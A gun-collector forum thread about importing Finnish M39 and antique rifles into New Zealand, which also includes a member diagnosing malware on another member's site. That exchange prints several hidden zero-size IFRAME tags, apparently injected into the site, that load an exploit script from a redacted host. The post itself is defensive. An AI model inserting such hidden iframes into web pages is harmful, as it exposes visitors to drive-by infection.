I'll Show You Mine If You'll Show Me Yours (Part Deux)

Thanks to someone pointing out one of the quirks of US gun laws; I am now the proud owner of two Finnish m39's:

I've always liked the look of the m39's so I'm chuffed.
(better pictures will be added to my site this weekend).

Theres a couple of steps:
1. Write letter to police asking for import permit (automatically given as these are on the list of approved imports).
2. Place order and email copy of permit
3. Receive letter from customs that rifles have arrived and I have 30-days to show up with the permit.
4. Go to customs show permit, pay tax (if value is over NZ$700) and walk out with rifles.

If these were full-autos/pistols the process is a little different, the import permit has to get approved by Wellington and is judged on a case by case basis. After the gun arrives I have to take it to the police station to have it registered to my licence.

Importing stuff into NZ is easy if you have do the right ground work; it's getting them out of other countries thats the hard part, even the USA.

Exactly, because these were built on pre-1899 dated receivers they are antique and not considered firearms. So no export licence was required!

All I had to do was send a copy of my drivers licence and import permit and they were in mail as soon as payment was processed!

Yep, that's how I bought twelve (currently own eight) from Wholesale guns without a C&R. Just sent them a copy of my drivers license with the payment and they ship them to my door.

Ever seen a rifle made in 1970 that isn't considered a rifle by the ATF?

Here you go!

Hey bas,

When I go to your web page gunpics.net, Avira AntiVir gives me an "virus/unwanted program" (HTURexploit.htm) alert.

Any clue what that could be about?

I hope somebody didn't mess with that page. Never got that warning before so hopefully it's just a missread by AntiVir.

Gonzo, do you know what a "HTURexploit.htm" is? I couldn't find any references on the net for it.

The actual html behind my site is dead simple with only the link for emailing me being written in some code to prevent bots harvesting it. Maybe thats setting off the trigger? I haven't changed it but maybe your current revision of Avira is sensitive to the script?

Looking through the access logs, I can't see anything loading apart from the pages people view.

Interesting. The mention of a virus got my inner IT-security nerd out :)

There's definitely code for an IFRAME containing a Javascript exploit on gunpics.net. It's not in the source of the pages but in the main page loading the other frames.
HTML:
<IFRAME src=http://xxx/cgi-bin/ie0606.cgi?homepage frameborder=0 width=0 height=0 scrolling=no></IFRAME>
<IFRAME src="http://xxx/cgi-bin/ie0606.cgi?homepage"
  frameborder=0  width=0 height=0 scrolling=no>
</IFRAME><IFRAME src="http://xxx/cgi-bin/ie0606.cgi?homepage" frameborder=0 width=0 height=0 scrolling=no></IFRAME><iframe src="http://xxx/cgi-bin/ie0609.cgi?homepage" width=5 height=5"></iframe>

WARNING dont go to the URLs (in the source) unless you know what you are doing... or use Opera :p
Probably hacked sites hosting the exploit.

My F-secure reports it as this nasty bugger:
http://www.viruslist.com/en/viruses/encyclopedia?virusid=162560
http://www.f-secure.com/v-descs/trojan-spy.shtml

So, an explanation would be in order I think? I'm not accusing you of anything, maybe your site was hacked too Bas?

I'm not telling anyone what to do with their rifles, but these RC mix-masters have been in their current form far longer than how they originally left the factory. If you take off the "incorrect" stock. You are removing the stock that has been on that rifle for 40+ years.

To me it's like when people take CMP Garands, and buy all new parts that were made in the same factory to make an "original, correct" Garand. They may be correct, but they are not original.

Edit: Sorry, this was a reply to a post pages ago. I thought I was on the last page when I read that post.

Oh, and, I hope to have this soon! :D

why do i get a feeling that someone mixed up their photos or that's a really wonky stamp because i have not heard of any known 1946 91/30s

i'm guessing gunbroker?

No, it's a person to person buy. Not an auction. Also, if you include snipers they made 91/30's until at least 1947. This could have been a rifle that wasn't up to sniper standards. So it was finished as a standard rifle.
